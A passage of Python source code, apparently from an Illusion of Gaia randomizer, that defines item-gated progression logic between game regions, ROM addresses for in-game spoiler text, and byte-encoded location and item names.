INACCESSIBLE: [False, [], 0, [0,0,0,b"\x00"], 0, "Inaccessible", [], False, [], [], [], [], [], [], [], []]
}
# Define logical paths in dynamic graph
# Format: { ID: [Status(-1=restricted,0=locked,1=unlocked,2=forced_open), StartRegion, DestRegion, NeedFreedan, [[item1, qty1],[item2,qty2]...]]}
self.logic = {
# Jeweler Rewards
0: [0, 1, 2, False, [[1, gem[0]]]], # Jeweler Reward 1
1: [0, 1, 2, False, [[1, gem[0] - 2], [41, 1]]],
2: [0, 1, 2, False, [[1, gem[0] - 3], [42, 1]]],
3: [0, 1, 2, False, [[1, gem[0] - 5], [41, 1], [42, 1]]],
4: [0, 2, 3, False, [[1, gem[1]]]], # Jeweler Reward 2
5: [0, 2, 3, False, [[1, gem[1] - 2], [41, 1]]],
6: [0, 2, 3, False, [[1, gem[1] - 3], [42, 1]]],
7: [0, 2, 3, False, [[1, gem[1] - 5], [41, 1], [42, 1]]],
8: [0, 3, 4, False, [[1, gem[2]]]], # Jeweler Reward 3
9: [0, 3, 4, False, [[1, gem[2] - 2], [41, 1]]],
10: [0, 3, 4, False, [[1, gem[2] - 3], [42, 1]]],
11: [0, 3, 4, False, [[1, gem[2] - 5], [41, 1], [42, 1]]],
12: [0, 4, 5, False, [[1, gem[3]]]], # Jeweler Reward 4
13: [0, 4, 5, False, [[1, gem[3] - 2], [41, 1]]],
14: [0, 4, 5, False, [[1, gem[3] - 3], [42, 1]]],
15: [0, 4, 5, False, [[1, gem[3] - 5], [41, 1], [42, 1]]],
16: [0, 5, 6, False, [[1, gem[4]]]], # Jeweler Reward 5
17: [0, 5, 6, False, [[1, gem[4] - 2], [41, 1]]],
18: [0, 5, 6, False, [[1, gem[4] - 3], [42, 1]]],
19: [0, 5, 6, False, [[1, gem[4] - 5], [41, 1], [42, 1]]],
20: [0, 6, 7, False, [[1, gem[5]]]], # Jeweler Reward 6
21: [0, 6, 7, False, [[1, gem[5] - 2], [41, 1]]],
22: [0, 6, 7, False, [[1, gem[5] - 3], [42, 1]]],
23: [0, 6, 7, False, [[1, gem[5] - 5], [41, 1], [42, 1]]],
24: [0, 7, 8, False, [[1, gem[6]]]], # Jeweler Reward 7 (Mansion)
25: [0, 7, 8, False, [[1, gem[6] - 2], [41, 1]]],
26: [0, 7, 8, False, [[1, gem[6] - 3], [42, 1]]],
27: [0, 7, 8, False, [[1, gem[6] - 5], [41, 1], [42, 1]]],
# Inter-Continental Travel
30: [0, 28, 15, False, [[37, 1]]], # South Cape: Erik w/ Lola's Letter
31: [0, 102, 15, False, [[37, 1]]], # Coast: Turbo w/ Lola's Letter
32: [0, 280, 15, False, [[37, 1]]], # Watermia: Bridgeman w/ Lola's Letter
33: [0, 160, 161, False, [[13, 1]]], # Neil's: Neil w/ Memory Melody
34: [0, 314, 17, False, [[505, 1]]], # Euro: Neil w/ Memory restored
35: [0, 402, 17, False, [[505, 1]]], # Dao: Neil w/ Memory restored
36: [0, 60, 64, False, [[25, 1]]], # Moon Tribe healed w/ Teapot
37: [0, 170, 16, False, [[502, 1]]], # Sky Garden: Spirits w/ spirits healed
38: [0, 280, 288, False, [[24, 1]]], # Watermia: Stablemaster w/ Will
39: [0, 310, 311, False, [[24, 1]]], # Euro: Stablemaster w/ Will
40: [0, 350, 351, False, [[10, 1]]], # Natives': Child Guide w/ Large Roast
# Edward's / Tunnel
60: [0, 32, 33, False, [[2, 1]]], # Escape cell w/Prison Key
61: [0, 33, 32, False, [[2, 1]]], # Enter cell w/Prison Key
62: [0, 45, 46, False, [[501, 1]]], # Progression w/ Lilly
63: [0, 47, 48, True, []], # Activate Bridge w/ Freedan
# Itory
70: [0, 50, 51, False, [[9, 1]]], # Town appears w/ Lola's Melody
71: [0, 55, 59, False, [[23, 1]]], # Get Lilly w/ Necklace
72: [0, 56, 57, False, [[61, 1]]], # Cave w/ Psycho Dash
73: [0, 56, 57, False, [[62, 1]]], # Cave w/ Psycho Slider
74: [0, 56, 57, False, [[63, 1]]], # Cave w/ Spin Dash
# Moon Tribe
80: [0, 61, 62, False, [[61, 1]]], # Cave challenge w/ Psycho Dash
81: [0, 61, 62, False, [[62, 1]]], # Cave challenge w/ Psycho Slide
82: [0, 61, 62, False, [[63, 1]]], # Cave challenge w/ Spin Dash
# Inca / Gold Ship / Freejia
89: [0, 72, 99, False, [[601, 1]]], # Map 29 progression w/ glitches
90: [0, 77, 78, False, [[3, 1], [4, 1]]], # Map 30 progression w/ Inca Statues
91: [0, 80, 81, False, [[61, 1]]], # Map 32 progression w/ Psycho Dash
92: [0, 80, 81, False, [[62, 1]]], # Map 32 progression w/ Psycho Slider
93: [0, 80, 81, False, [[63, 1]]], # Map 32 progression w/ Spin Dash
94: [0, 85, 86, True, []], # Map 35 progression w/ Freedan
95: [0, 87, 88, False, [[8, 1]]], # Map 36 progression w/ Wind Melody
96: [0, 89, 90, False, [[7, 1]]], # Map 37 progression w/ Diamond Block
97: [0, 91, 92, False, [[61, 1]]], # Map 38 progression w/ Psycho Dash
98: [0, 91, 92, False, [[62, 1]]], # Map 38 progression w/ Psycho Slider
99: [0, 91, 92, False, [[63, 1]]], # Map 38 progression w/ Spin Dash
#100: [0, 100, 104, False, [[100, 1]]], # Gold Ship progression w/ Statue 1
101: [0, 110, 115, False, [[504, 1]]], # Freejia: Slaver item w/ Laborer Found
# Diamond Mine
110: [0, 131, 132, False, [[61, 1]]], # Map 61 false wall w/ Psycho Dash
111: [0, 131, 132, False, [[62, 1]]], # Map 61 false wall w/ Psycho Slider
112: [0, 131, 132, False, [[63, 1]]], # Map 61 false wall w/ Spin Dash
113: [0, 134, 135, False, [[15, 1]]], # Map 63 progression w/ Elevator Key
114: [0, 136, 137, False, [[61, 1]]], # Map 64 trapped laborer w/ Psycho Dash
115: [0, 136, 137, False, [[62, 1]]], # Map 64 trapped laborer w/ Psycho Slider
116: [0, 136, 137, False, [[63, 1]]], # Map 64 trapped laborer w/ Spin Dash
117: [0, 138, 139, False, [[63, 1]]], # Map 65 progression w/ Spin Dash
118: [0, 138, 139, True, [[64, 1]]], # Map 65 progression w/ Dark Friar
119: [0, 146, 147, False, [[11, 1], [12, 1]]], # Map 68 progression w/ mine keys
# Sky Garden
130: [0, 170, 171, False, [[14, 4]]], # Boss access w/ Crystal Balls
131: [0, 177, 178, True, [[64, 1]]], # Map 79 progression w/ Dark Friar
132: [0, 177, 178, True, [[67, 1]]], # Map 79 progression w/ Firebird
133: [0, 168, 182, False, [[506, 1]]], # Map 81 progression w/ switch 1
134: [0, 182, 183, False, [[507, 1]]], # Map 81 progression w/ switch 2
135: [0, 182, 184, False, [[61, 1]]], # Map 81 progression w/ Psycho Dash
136: [0, 182, 184, False, [[62, 1]]], # Map 81 progression w/ Psycho Dash
137: [0, 182, 184, False, [[63, 1]]], # Map 81 progression w/ Psycho Dash
138: [0, 184, 185, False, [[508, 1], [61, 1]]], # Map 81 progression w/ switch 3 & Psycho Dash
139: [0, 184, 185, False, [[508, 1], [62, 1]]], # Map 81 progression w/ switch 3 & Psycho Slider
140: [0, 184, 185, False, [[508, 1], [63, 1]]], # Map 81 progression w/ switch 3 & Spin Dash
141: [0, 181, 182, False, [[63, 1]]], # Map 81 progression w/ Spin Dash
142: [0, 181, 184, False, [[63, 1]]], # Map 81 progression w/ Spin Dash
143: [0, 182, 185, False, [[63, 1]]], # Map 81 progression w/ Spin Dash
144: [0, 188, 189, True, []], # Map 82 progression w/ Freedan
145: [0, 188, 189, False, [[601, 1]]], # Map 82 progression w/ Glitches
146: [0, 192, 190, False, [[63, 1]]], # Map 83 progression w/ Spin Dash
147: [0, 195, 199, True, [[64, 1]]], # Map 84 progression w/ Dark Friar
148: [0, 195, 199, True, [[67, 1]]], # Map 84 progression w/ Firebird
149: [0, 195, 199, True, [[65, 1]]], # Map 84 progression w/ Aura Barrier
150: [0, 197, 199, True, [[64, 1]]], # Map 84 progression w/ Dark Friar
151: [0, 197, 199, True, [[67, 1]]], # Map 84 progression w/ Firebird
152: [0, 170, 16, False, [[502, 1]]], # Moon Tribe passage w/ spirits healed
# Seaside Palace
160: [0, 205, 208, False, [[501, 1]]], # Coffin access w/ Lilly
161: [0, 209, 510, False, [[17, 1]]], # Purify fountain w/stone
162: [0, 200, 206, False, [[510, 1]]], # Buffy access w/ purified fountain
163: [0, 200, 201, False, [[16, 1]]], # Seaside to Mu w/ Mu key
164: [0, 210, 211, False, [[16, 1]]], # Mu to Seaside w/ Mu key
# Mu
170: [0, 212, 245, False, [[62, 1]]], # Map 95 progression w/ Psycho Slider
171: [0, 212, 213, False, [[511, 1]]], # Map 95 progression w/ water lowered 1
172: [0, 213, 215, False, [[512, 1]]], # Map 95 progression w/ water lowered 2
173: [0, 214, 216, False, [[512, 1]]], # Map 95 progression w/ water lowered 2
174: [0, 217, 218, False, [[511, 1]]], # Map 96 progression w/ water lowered 1
175: [0, 222, 221, True, [[511, 1], [64, 1]]], # Map 97 progression w/ water lowered 1 & Friar
176: [0, 222, 221, True, [[511, 1], [67, 1]]], # Map 97 progression w/ water lowered 1 & Firebird
177: [0, 222, 221, False, [[511, 1], [601, 1]]], # Map 97 progression w/ water lowered 1 & glitches
178: [0, 226, 227, False, [[511, 1]]], # Map 98 progression w/ water lowered 1
179: [0, 227, 229, False, [[512, 1]]], # Map 98 progression w/ water lowered 2
180: [0, 228, 230, False, [[512, 1]]], # Map 98 progression w/ water lowered 2
181: [0, 229, 230, False, [[62, 1]]], # Map 98 progression w/ Psycho Slider
182: [0, 230, 229, False, [[62, 1]]], # Map 98 progression w/ Psycho Slider
183: [0, 226, 246, False, [[62, 1]]], # Map 98 progression w/ Psycho Slider
184: [0, 237, 238, False, [[62, 1]]], # Map 101 progression w/ Psycho Slider
185: [0, 240, 241, False, [[19, 2]]], # Map 102 progression w/ Rama Statues
186: [0, 231, 247, False, [[18, 1]]], # Water lowered 1 w/ Hope Statue
187: [0, 232, 248, False, [[18, 2]]], # Water lowered 2 w/ Hope Statues
# Angel Dungeon
210: [0, 263, 264, False, [[62, 1]]], # Map 112 progression w/ Psycho Slider
211: [0, 265, 275, False, [[62, 1]]], # Map 112 backwards progression w/ Psycho Slider
212: [0, 267, 268, False, [[62, 1]]], # Map 114 progression w/ Psycho Slider
213: [0, 277, 276, False, [[62, 1]]], # Map 114 backwards progression w/ Psycho Slider
214: [0, 272, 273, False, [[513, 1]]], # Ishtar's chest w/ puzzle complete
# Great Wall
220: [0, 294, 295, False, [[601, 1]]], # Map 133 progression w/ glitches
221: [0, 296, 295, False, [[63, 1]]], # Map 133 progression w/ Spin Dash
222: [0, 296, 295, True, []], # Map 133 progression w/ Freedan
223: [0, 298, 299, True, [[64, 1]]], # Map 135 progression w/ Friar
224: [0, 298, 299, True, [[67, 1]]], # Map 135 progression w/ Firebird
225: [0, 299, 298, False, [[64, 1], [54, 2]]], # Map 135 progression w/ Friar III
227: [0, 300, 301, False, [[63, 1]]], # Map 136 progression w/ Spin Dash
228: [0, 295, 294, False, [[63, 1]]], # Map 133 progression w/ Spin Dash
# Euro
230: [0, 314, 315, False, [[40, 1]]], # Ann item w/ Apple
# Mt. Temple
240: [0, 331, 332, False, [[63, 1]]], # Map 161 progression w/ Spin Dash
241: [0, 332, 331, False, [[63, 1]]], # Map 161 backwards progression w/ Spin Dash
242: [0, 333, 514, False, [[26, 1]]], # Map 162 progression w/ Mushroom drops 1
243: [0, 335, 514, False, [[26, 1]]], # Map 162 progression w/ Mushroom drops 1 -- IS THIS TRUE?
244: [0, 339, 515, False, [[26, 2]]], # Map 162 progression w/ Mushroom drops 2
245: [0, 340, 515, False, [[26, 2]]], # Map 162 progression w/ Mushroom drops 2 -- IS THIS TRUE?
246: [0, 340, 516, False, [[26, 3]]], # Map 162 progression w/ Mushroom drops 3
247: [0, 341, 516, False, [[26, 3]]], # Map 162 progression w/ Mushroom drops 3 -- IS THIS TRUE?
# Natives'
250: [0, 353, 354, False, [[29, 1]]], # Statues awake w/ Gorgon Flower
# Ankor Wat
260: [-1, 361, 362, True, [[64, 1]]], # Map 177 progression w/ Friar
261: [0, 363, 364, False, [[63, 1]]], # Map 178 progression w/ Spin Dash
262: [0, 364, 365, False, [[62, 1]]], # Map 178 progression w/ Psycho Slider
263: [0, 365, 364, False, [[62, 1]]], # Map 178 progression w/ Psycho Slider
264: [0, 367, 366, False, [[63, 1]]], # Map 179 progression w/ Spin Dash
265: [0, 369, 370, False, [[62, 1]]], # Map 181 progression w/ Psycho Slider
266: [0, 370, 371, False, [[63, 1]]], # Map 181 progression w/ Spin Dash
267: [0, 373, 374, True, [[66, 1]]], # Map 183 progression w/ Earthquaker
268: [0, 373, 374, True, [[64, 1], [54, 2]]], # Map 183 progression w/ upgraded Friar
269: [0, 373, 374, True, [[64, 1], [601, 1]]], # Map 183 progression w/ Friar and glitches
270: [0, 373, 374, True, [[67, 1]]], # Map 183 progression w/ Firebird -- IS THIS TRUE?
271: [0, 376, 377, True, [[64, 1]]], # Map 184 progression w/ Friar
272: [0, 376, 377, True, [[36, 1]]], # Map 184 progression w/ Shadow
273: [0, 384, 392, False, [[28, 1]]], # Map 188 progression w/ Black Glasses
274: [0, 385, 393, False, [[28, 1]]], # Map 188 progression w/ Black Glasses
275: [0, 384, 392, False, [[601, 1]]], # Map 188 progression w/ glitches
276: [0, 385, 393, False, [[601, 1]]], # Map 188 progression w/ glitches
277: [0, 392, 393, False, [[62, 1]]], # Map 188 progression w/ Slider
278: [0, 393, 392, False, [[62, 1]]], # Map 188 progression w/ Slider
279: [0, 386, 387, False, [[62, 1]]], # Map 188 progression w/ Psycho Slider
280: [0, 387, 386, False, [[62, 1]]], # Map 188 progression w/ Psycho Slider
# Pyramid
290: [0, 410, 411, False, [[62, 1]]], # Map 204 progression w/ Slider
291: [0, 410, 411, False, [[63, 1]]], # Map 204 progression w/ Spin
292: [0, 410, 411, False, [[601, 1]]], # Map 204 progression w/ glitches
293: [0, 411, 412, False, [[36, 1]]], # Map 204 progression w/ Aura
294: [0, 411, 413, False, [[36, 1]]], # Map 204 progression w/ Aura
295: [0, 415, 449, False, [[30, 1], [31, 1], [32, 1], [33, 1], [34, 1], [35, 1], [38, 1]]],
# Boss door open w/ Hieroglyphs
296: [0, 416, 417, False, [[63, 1]]], # Map 206 progression w/ Spin Dash
297: [0, 417, 416, False, [[63, 1]]], # Map 206 progression w/ Spin Dash
298: [0, 418, 419, False, [[63, 1]]], # Map 206 progression w/ Spin Dash
299: [0, 419, 418, False, [[63, 1]]], # Map 206 progression w/ Spin Dash
300: [0, 426, 427, True, [[36, 1]]], # Map 212 progression w/ Aura
301: [0, 426, 427, True, [[66, 1]]], # Map 212 progression w/ Earthquaker
302: [0, 427, 428, True, [[36, 1]]], # Map 212 progression w/ Aura
303: [0, 427, 429, True, [[36, 1]]], # Map 212 progression w/ Aura
304: [0, 427, 429, True, [[66, 1]]], # Map 212 progression w/ Earthquaker
305: [0, 431, 432, False, [[63, 1]]], # Map 214 progression w/ Spin Dash
306: [0, 431, 434, True, [[36, 1]]], # Map 214 progression w/ Aura
307: [0, 431, 433, True, [[64, 1]]], # Map 214 progression w/ Friar
308: [0, 438, 439, False, [[63, 1]]], # Map 217 progression w/ Spin Dash
309: [0, 439, 438, False, [[63, 1]]], # Map 217 progression w/ Spin Dash
310: [0, 440, 441, False, [[63, 1]]], # Map 219 progression w/ Spin Dash
311: [0, 441, 440, False, [[63, 1]]], # Map 219 progression w/ Spin Dash
312: [0, 435, 450, False, [[6, 6], [50, 2], [51, 1], [52, 1]]],
# Killer 6 w/ herbs and upgrades
313: [0, 435, 450, True, [[64, 1], [54, 1]]],
# Killer 6 w/ Friar II
314: [0, 411, 414, False, [[517, 1]]], # Pyramid to boss w/hieroglyphs placed
# Babel / Mansion
320: [0, 461, 462, False, [[36, 1], [39, 1]]], # Map 219 progression w/ Aura and Ring
321: [0, 473, 479, False, [[522, 1]]], # Olman statue w/ Mummy Queen 2
322: [0, 473, 479, False, [[523, 1]]], # Olman statue w/ Solid Arm
323: [0, 480, 481, False, [[62, 1]]], # Mansion progression w/ Slider
# Endgame / Misc
400: [-1, 49, 490, False, [[20, 1]]], # Rescue Kara from Edward's w/ Magic Dust
401: [-1, 150, 490, False, [[20, 1]]], # Rescue Kara from Mine w/ Magic Dust
402: [-1, 270, 490, False, [[20, 1]]], # Rescue Kara from Angel w/ Magic Dust
403: [-1, 345, 490, False, [[20, 1]]], # Rescue Kara from Mt. Temple w/ Magic Dust
404: [-1, 391, 490, False, [[20, 1]]], # Rescue Kara from Ankor Wat w/ Magic Dust
405: [0, 490, 491, False, [[36, 1], [39, 1], [602, 1]]], # Early Firebird w/ Kara, Aura and Ring
406: [0, 490, 492, False, [[36, 1], [100, 0], [101, 0], [102, 0], [103, 0], [104, 0], [105, 0]]],
# Beat Game w/Mystic Statues and Aura
407: [0, 490, 492, False, [[36, 1], [106, self.statues_required]]] # Beat Game w/Mystic Statues and Aura (player choice variant)
}
# Define addresses for in-game spoiler text
self.spoiler_addresses = {
0: "4caf5", # Edward's Castle guard, top floor (4c947)
1: "4e9ff", # Itory elder (4e929)
2: "58ac0", # Gold Ship queen (589ff)
3: "5ad6b", # Man at Diamond Coast (5ab5c)
# 4: "5bfde", # Freejia laborer (5bfaa)
5: "69167", # Seaside Palace empty coffin (68feb)
6: "6dc97", # Ishtar's apprentice (6dc50)
7: "79c81", # Watermia, Kara's journal (79bf5)
8: "7d892", # Euro: Erasquez (7d79e)
9: "89b2a", # Ankor Wat, spirit (89abf)
10: "8ad0c", # Dao: girl with note (8acc5)
11: "99b8f" # Babel: spirit (99b2e)
}
# Define location text for in-game format
self.location_text = {
0: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
1: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
2: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
3: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
4: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
5: b"\x64\x87\x84\xac\x49\x84\xa7\x84\x8b\x84\xa2", # "the Jeweler"
6: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
7: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
8: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
9: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
10: b"\x63\x8e\xa5\xa4\x87\xac\x42\x80\xa0\x84", # "South Cape"
11: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x42\x80\xa3\xa4\x8b\x84", # "Edward's Castle"
12: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x42\x80\xa3\xa4\x8b\x84", # "Edward's Castle"
13: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x60\xa2\x88\xa3\x8e\x8d", # "Edward's Prison"
14: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x60\xa2\x88\xa3\x8e\x8d", # "Edward's Prison"
15: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
16: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
17: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
18: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
19: b"\x44\x83\xa7\x80\xa2\x83\x0e\xa3\xac\x64\xa5\x8d\x8d\x84\x8b", # "Edward's Tunnel"
20: b"\x48\xa4\x8e\xa2\xa9", # "Itory"
21: b"\x48\xa4\x8e\xa2\xa9", # "Itory"
22: b"\x48\xa4\x8e\xa2\xa9", # "Itory"
23: b"\x4c\x8e\x8e\x8d\xac\x64\xa2\x88\x81\x84", # "Moon Tribe"
24: b"\x48\x8d\x82\x80", # "Inca"
25: b"\x48\x8d\x82\x80", # "Inca"
26: b"\x48\x8d\x82\x80", # "Inca"
27: b"\x48\x8d\x82\x80", # "Inca"
28: b"\x63\x88\x8d\x86\x88\x8d\x86\xac\xa3\xa4\x80\xa4\xa5\x84", # "Singing Statue"
29: b"\x48\x8d\x82\x80", # "Inca"
30: b"\x48\x8d\x82\x80", # "Inca"
31: b"\x48\x8d\x82\x80", # "Inca"
32: b"\x46\x8e\x8b\x83\xac\x63\x87\x88\xa0", # "Gold Ship"
33: b"\xd6\x0e\x42\x8e\x80\xa3\xa4", # "Diamond Coast"
34: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
35: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
36: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
37: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
38: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
39: b"\x45\xa2\x84\x84\x89\x88\x80", # "Freejia"
40: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
41: b"\x4b\x80\x81\x8e\xa2\x84\xa2", # "Laborer"
42: b"\x4b\x80\x81\x8e\xa2\x84\xa2", # "Laborer"
43: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
44: b"\x4b\x80\x81\x8e\xa2\x84\xa2", # "Laborer"
45: b"\x63\x80\x8c", # "Sam"
46: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
47: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
48: b"\xd6\x0e\x4c\x88\x8d\x84", # "Diamond Mine"
49: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
50: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
51: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
52: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
53: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
54: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
55: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
56: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
57: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
58: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
59: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
60: b"\x63\x8a\xa9\xac\x46\x80\xa2\x83\x84\x8d", # "Sky Garden"
61: b"\xd7\x32\xd7\x93", # "Seaside Palace"
62: b"\xd7\x32\xd7\x93", # "Seaside Palace"
63: b"\xd7\x32\xd7\x93", # "Seaside Palace"
64: b"\x41\xa5\x85\x85\xa9", # "Buffy"
65: b"\x42\x8e\x85\x85\x88\x8d", # "Coffin"
66: b"\xd7\x32\xd7\x93", # "Seaside Palace"
67: b"\x4c\xa5", # "Mu"
68: b"\x4c\xa5", # "Mu"
69: b"\x4c\xa5", # "Mu"
70: b"\x4c\xa5", # "Mu"
71: b"\x4c\xa5", # "Mu"
72: b"\x4c\xa5", # "Mu"
73: b"\x4c\xa5", # "Mu"
74: b"\x4c\xa5", # "Mu"
75: b"\x4c\xa5", # "Mu"
76: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
77: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
78: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
79: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
80: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
81: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
82: b"\xd6\x01\x66\x88\x8b\x8b\x80\x86\x84", # "Angel Village"
83: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
84: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
85: b"\x4b\x80\x8d\x82\x84", # "Lance"
86: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
87: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
88: b"\x67\x80\xa4\x84\xa2\x8c\x88\x80", # "Watermia"
89: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
90: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
91: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
92: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
93: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
94: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
95: b"\xd6\x16\x67\x80\x8b\x8b", # "Great Wall"
96: b"\x44\xa5\xa2\x8e", # "Euro"
97: b"\x44\xa5\xa2\x8e", # "Euro"
98: b"\x44\xa5\xa2\x8e", # "Euro"
99: b"\x44\xa5\xa2\x8e", # "Euro"
100: b"\x44\xa5\xa2\x8e", # "Euro"
101: b"\x44\xa5\xa2\x8e", # "Euro"
102: b"\x40\x8d\x8d", # "Ann"
103: b"\x44\xa5\xa2\x8e", # "Euro"
104: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
105: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
106: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
107: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
108: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3\xac\x6e\x84\x8d\x83\x6f", # "Mt. Kress (end)"
109: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
110: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
111: b"\x4c\xa4\x2a\xac\x4a\xa2\x84\xa3\xa3", # "Mt. Kress"
112: b"\xd7\x21\x66\x88\x8b\x8b\x80\x86\x84", # "Native Village"
113: b"\x63\xa4\x80\xa4\xa5\x84", # "Statue"
114: b"\xd7\x21\x66\x88\x8b\x8b\x80\x86\x84", # "Native Village"
115: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
116: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
117: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
118: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
119: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
120: b"\x63\x87\xa2\xa5\x81\x81\x84\xa2", # "Shrubber"
121: b"\x63\xa0\x88\xa2\x88\xa4", # "Spirit"
122: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
123: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
124: b"\x40\x8d\x8a\x8e\xa2\xac\x67\x80\xa4", # "Ankor Wat"
125: b"\x43\x80\x8e", # "Dao"
126: b"\x43\x80\x8e", # "Dao"
127: b"\x43\x80\x8e", # "Dao"
128: b"\x63\x8d\x80\x8a\x84\xac\x86\x80\x8c\x84", # "Snake Game"
129: b"\x43\x80\x8e", # "Dao"
130: b"\x46\x80\x88\x80", # "Gaia"
131: b"\xd6\x3f", # "Pyramid"
132: b"\xd6\x3f", # "Pyramid"
133: b"\xd6\x3f", # "Pyramid"
134: b"\xd6\x3f", # "Pyramid"
135: b"\xd6\x3f", # "Pyramid"
136: b"\x4a\x88\x8b\x8b\x84\xa2\xac\x26", # "Killer 6"
137: b"\xd6\x3f", # "Pyramid"
138: b"\xd6\x3f", # "Pyramid"
139: b"\xd6\x3f", # "Pyramid"
140: b"\xd6\x3f", # "Pyramid"
141: b"\xd6\x3f", # "Pyramid"
142: b"\xd6\x3f", # "Pyramid"
143: b"\x41\x80\x81\x84\x8b", # "Babel"
144: b"\x41\x80\x81\x84\x8b", # "Babel"
145: b"\x41\x80\x81\x84\x8b", # "Babel"
146: b"\x41\x80\x81\x84\x8b", # "Babel"
147: b"\x49\x84\xa7\x84\x8b\x84\xa2\x0e\xa3\xac\x4c\x80\x8d\xa3\x88\x8e\x8d", # "Jeweler's Mansion"
148: "", # "Castoth"
149: "", # "Viper"
150: "", # "Vampires"
151: "", # "Sand Fanger"
152: "", # "Mummy Queen"
153: "" # "Olman"
}
# Define long item text for in-game format
self.item_text_long = {
0: b"\xd3\xd6\x1d\x8d\x8e\xa4\x87\x88\x8d\x86\x4f\xac\xac\xac\xac\xac\xac\xac\xac",
1: b"\xd3\xd6\x1d\x80\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\x4f\xac\xac\xac\xac",
2: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x60\xa2\x88\xa3\x8e\x8d\xac\x4a\x84\xa9\x4f\xac",
